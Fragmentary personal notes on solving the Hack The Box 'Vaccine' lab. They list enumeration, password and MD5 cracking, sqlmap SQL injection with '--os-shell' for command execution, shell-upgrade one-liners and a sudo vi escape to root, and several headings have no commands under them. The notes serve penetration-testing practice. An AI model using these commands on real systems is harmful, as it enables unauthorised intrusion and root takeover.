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HTB - Vaccine
sudo nmap -T4 -p- -A
Nessus scan for fun Start with sudo /etc/init.d/nessusd start
and go to https://kali:8834
Enumerate HTTP
Ran nikto -h
Ran dirbuster
, wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
Enumerate FTP
Try ftpuser:mc@F1l3ZilL4
from opsie
Result: A file named is found in the folder. Extraction of the archive fails as it's password protected.
Password cracking: The password can be cracked using JohntheRipper and rockyou.txt.
ZIP Password: 741852963
Extracting it's contents using the password reveals a PHP file and a CSS file. index.php
Result: The input password is hashed and compared to the MD5 hash: 2cb42f8734ea607eefed3b70af13bbd3
This hash can be easily cracked using an online rainbow table such as crackstation. Result: password is qwerty789
Browsing to port 80, we can see a login page for MegaCorp. The credentials admin:qwerty789
can be used to login.
Search parameter in URL:
Get PHP Session ID: PHPSESSID:"lkktfc22hu9uer2mlo36ngk6db"
Scan for SQL injection with metasploit
Result: System is vulnerable
SQL injection scan with sqlmap
Sqlmap found the page to be vulnerable to multiple injections, and identified the backend DBMS to be PostgreSQL. Getting code execution in postgres is trivial using the --os-shell
Exploit: sqlmap -u '' --cookie="PHPSESSID=0fn7flfi1tt116v52ahvfh8in3" --os-shell
--os-pwn Result: Failed forever
Exploit 2: sqlmap -u '' --cookie="PHPSESSID=0fn7flfi1tt116v52ahvfh8in3" --os-shell --safe-url --keep-alive --dbms PostgreSQL --safe-freq 3
Result: Popped a shell
Let's upgrade to a tty shell and continue enumeration: SHELL=/bin/bash script -q /dev/null
Form reverse meterpreter
Bash reverse shell
Privilege Escalation
Looking at the source code of dashboard.php in /var/www/html reveals the postgres password to be: P@s5w0rd!.
Looking at the source code of dashboard.php in /var/www/html
reveals the postgres password to be: P@s5w0rd!
Run SHELL=/bin/bash script -q /dev/null
again or try python3 -c 'import pty; pty.spawn("/bin/bash")'
This password can be used to view the user's sudo privileges: sudo -l
User is allowed to edit a file using vi as root, which can spawn a root shell: sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
. Press escape to enter normal mode then type :
to enter command-line mode and enter !/bin/bash
to get root shell
Get more stable shell
Form reverse meterpreter
Bash reverse shell
Upgrade to meterpreter
Allow access in at any time with SSH
And then in normal attacker prompt:
Get Flag